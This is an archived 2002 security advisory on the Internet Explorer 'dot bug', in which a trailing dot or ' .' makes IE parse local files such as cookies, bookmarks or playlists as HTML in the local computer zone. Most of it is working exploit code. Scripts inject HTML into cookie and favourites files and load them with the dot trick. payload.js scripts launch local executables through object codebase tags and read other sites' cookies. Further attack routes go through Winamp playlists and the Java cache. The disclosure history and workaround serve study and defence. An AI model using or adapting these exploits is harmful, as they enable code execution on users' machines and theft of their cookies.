Visit our newest sister site!
Hundreds of free aircraft flight manuals
Civilian • Historical • Military • Declassified • FREE!


TUCoPS :: Browsers :: expl5354.htm

Internet Explorer dot bug



21th May 2002 [SBWID-5354]
COMMAND

	IE dot bug

SYSTEMS AFFECTED

	IE all releases ??

PROBLEM

	

	                                                   _     _

	                                                 o\' \\,=./ `o

	Andreas Sandblad [sandblad@acc.umu.se] posted :     (o o)

	---=--=---=--=--=---=--=--=--=--=---=--=--=-----ooO--(_)--Ooo---

	

	

	In order for IE to parse a local file as a html  document  the  filename
	extension must be associated with  html  documents  (normally  .htm  and
	.html). Also html code must be found somewhere in the beginning  of  the
	file (IE will only scan a certain amount of bytes in the file). This  is
	good security because several types  of  userdata  is  stored  in  local
	files (cookies,  favorites/bookmarks,  application  userdata  etc).  The
	problem is that IE can be tricked into thinking that a local file  is  a
	html document regardless of file extension.
	

	The trick is to  simply  add  a  dot  \".\"  when  linking  to  a  local
	filename. If we link to a file with the .txt extension then we must  add
	\" .\" instead as of patch  MS02-023.  To  test  this  behaviour  simply
	create a file called c:/test.txt with some html code in it. Now  compare
	the difference in parse behaviour by typing the following in the  adress
	field:
	

	about:<a href=\"file:///c:/test.txt .\">test.txt .</a>

	

	and compare it with:
	

	about:<a href=\"file:///c:/test.txt\">test.txt</a>

	

	The exploit method is the following:
	

	 1. Find a file storing part of data possible to control (generated by IE

	    or any other third part software).

	

	 2. Make sure the data is inserted in the first x amount of bytes.

	

	 3. Inject html+script code in the file and link to it together with a dot

	    (or space + dot for .txt files). The script will be operating in the local

	    computer zone.

	

	

	

	 EXPLOITS:

	 ========

	

	

	----------------------------------------------------------------

	NOTE: Please note that you MUST change some variables

	      in order for the exploits to work. The following exploits

	      has only been tested on IE 6.0. Because the exploits

	      require knowledge of exact path to files, they may fail

	      on non default systems.

	----------------------------------------------------------------

	

	

	 --=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-

	 METHOD:  Cookie based script execution

	 IMPACT:  Scripting in local computer zone - running local

	          programs, running signed programs from a webpage,

	          reading local files.

	 PATCH:   MS02-015 released 28 March 2002 will stop this exploit.

	 NOTE:    - This exploit is designed for Win 98/ME. In order

	          to work on win 2000/XP username must be known.

	          Please change cookieFile and scriptFile.

	          - Code must be in a directory called \"unique\" to

	          get correct name of cookie file.

	 --=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-

	

	- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -

	<script>

	//cookieFile = \"c:/DOCUME~1/ADMINI~1/cookies/administrator@unique[1].txt\";

	//cookieFile = \"c:/windows/cookies/anyuser@unique[1].txt\";

	//scriptFile = \"http://www.microsoft.com/unique/payload.js\";

	

	function injectCookie(){

	  code = \"<html><script src=\'\"+scriptFile+\"\'><\"+\"/script><\"+\"/html>\";

	  document.cookie = \"evil=\"+code+\"; expires=Fri, 13 Dec 2003 23:59:59

	GMT;\";

	  alert(\"*** Cookie injected! ***\");

	}

	function loadCookie(){

	  alert(\"*** Loading cookie! ***\");

	  document.location=\"file:///\"+cookieFile+\".\"; // the important dot!

	}

	</script>

	

	<a href=\"javascript:injectCookie()\">injectCookie() step 1.</a><br>

	<a href=\"javascript:loadCookie()\">loadCookie() step 2.</a>

	- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -

	

	payload.js:
	

	- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -

	files = new Array(

	  \"c:/windows/system32/winmine.exe\",

	  \"c:/windows/winmine.exe\",

	  \"c:/winnt/system32/winmine.exe\"

	);

	function init(){

	  for (i=0;files[i];i++)

	  {

	    s = \'<object classid=CLSID:12345678-1234-1234-1234-123456789012 \';

	    s+= \'codebase=\"file:///\'+files[i]+\'\" style=display:none></object>\';

	    document.write(\"<html>\"+s+\"<\"+\"/html>\");

	  }

	}

	window.onload=init;

	- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -

	

	

	 --=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-

	 METHOD:  Cookie based cookie reading

	 IMPACT:  Reading content of arbitrary cookie.

	 PATCH:   MS02-023 released 15 May 2002 will stop this exploit.

	 NOTE:    - Use the same exploit as for the

	          \"Cookie based script execution\", but replace

	          payload.js with code below.

	          - cookieRead is set to read your google cookie.

	          The cookie must of course exist. cookieRead must be

	          altered.

	 ----------------------------------------------------------------

	

	payload.js:
	

	- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -

	//cookieRead = \"administrator@google[1].txt\";

	//cookieRead = \"anyuser@google[1].txt\";

	s = \'<iframe name=i src=\'+cookieRead+\' style=display:none onload=\';

	s+= \'alert(i.document.body.innerText)></iframe>\';

	document.write(s);

	- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -

	

	

	 --=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-

	 METHOD:  Favorite/bookmark based script execution

	 IMPACT:  Scripting in local computer zone.

	 PATCH:   NONE

	 NOTE:    - This exploit is designed for Win 98/ME. In order

	          to work on win 2000/XP username must be known.

	          Please change bookmarkFile and scriptFile.

	          - Use the same payload.js as in the exploit

	          \"Cookie based script execution\".

	 ----------------------------------------------------------------

	

	- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -

	<script>

	//bookmarkFile = \"c:/DOCUME~1/ADMINI~1/favorites/unique.url\";

	//bookmarkFile = \"c:/windows/favorites/unique.url\";

	//scriptFile = \"http://www.microsoft.com/unique/payload.js\";

	

	function injectBookmark(){

	  code = \'<html><script>document.scripts[0].src=\"\';

	  code += scriptFile+\'\"<\'+\'/script><\'+\'/html>\';

	  window.external.AddFavorite(\'http://\'+code,\'unique\');

	}

	function loadBookmark(){

	  alert(\"*** Loading bookmark file! ***\");

	  document.location=\"file:///\"+bookmarkFile+\".\"; // the important dot!

	}

	</script>

	

	<a href=\"javascript:injectBookmark()\">injectBookmark() step 1.</a><br>

	<a href=\"javascript:loadBookmark()\">loadBookmark() step 2.</a>

	- - - - - - - - - - CUT HERE - - - - - - - - - - - - - - - - - -

	

	

	 --=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=--=-

	 METHOD:  Third part software based script execution

	 IMPACT:  Scripting in local computer zone. For some softwares

	          execute arbitrary remote programs.

	 PATCH:   NONE

	 NOTE:    Only a few third part softwares investigated.

	 ----------------------------------------------------------------

	

	Winamp:    Winamp    stores    current    playlist    in    \"c:/program
	files/winamp/winamp.m3u\". The playlist will  contain  artist  name  and
	song title. If we inject html/script code in the artist/title of  a  mp3
	file (ID3v2 tag) that is loaded remotely, the new playlist file will  be
	saved together  with  html  code.  Using  the  dotbug  trick  the  local
	playlist file can be loaded and operate in the  local  zone.  Since  the
	playlist file will contain the exact path to the \"temporarily  internet
	folder\", we can using the old \".chm helpfile attack\" or the  codebase
	of object tag run arbitrary code.
	

	Java(TM) 2 SDK, Standard Edition, v 1.4.0: Classfiles and  graphics  for
	applets are  stored  in  %userprofile%\\.jpi_cache\\file\\1.0\\  Exploit
	method: Insert html/script code in a gif picture used in a  java  applet
	loaded from remote webpage. The local filename of the  picture  will  be
	named something like (random characters):
	

	exploita.gif-41615d6-26f536aa.gif

	

	This is equal to EXPLOI~1.GIF (old filesystem support). Use the dot  bug
	trick to load the file as a html document. Script will be  operating  in
	the local computer zone.
	

	

	 Bug History

	 ===========

	

	[2002-02-17] 

	Initially reported to Microsoft about the dot bug vulnerability.
	

	[2002-03-28] 

	Microsoft released patch: \"Cookie-based Script Execution\" (MS02-015)
	

	Solution: Files in the cookie directory are not  treated  as  beeing  in
	the local computer zone.
	

	Problem: Not fixing the real issue. Still possible  to  use  the  cookie
	based attack to read other cookies.
	

	

	[2002-03-30] 

	A non disclosure advisory sent to  Bugtraq:  \"IE:  Remote  webpage  can
	script in local zone\" http://online.securityfocus.com/archive/1/265459
	

	

	[2002-05-15] 

	Microsoft released patch:  \"Script  within  Cookies  Reading  Cookies\"
	(MS02-023)
	

	Solution: Put files in the cookie  directory  in  the  restrictive  zone
	(disables exploit to read other cookies). Attempt to disable that  local
	files with .txt extentension can be parsed as a html document using  the
	dot bug.
	

	Problem: Real issue still not fixed. By  appending  \"  .\"  instead  of
	\".\" files with .txt extension can be treated as html documents.

SOLUTION

	Workaround: Disable active scripting
	

	Wait for yet another I.e patch.


TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2014 AOH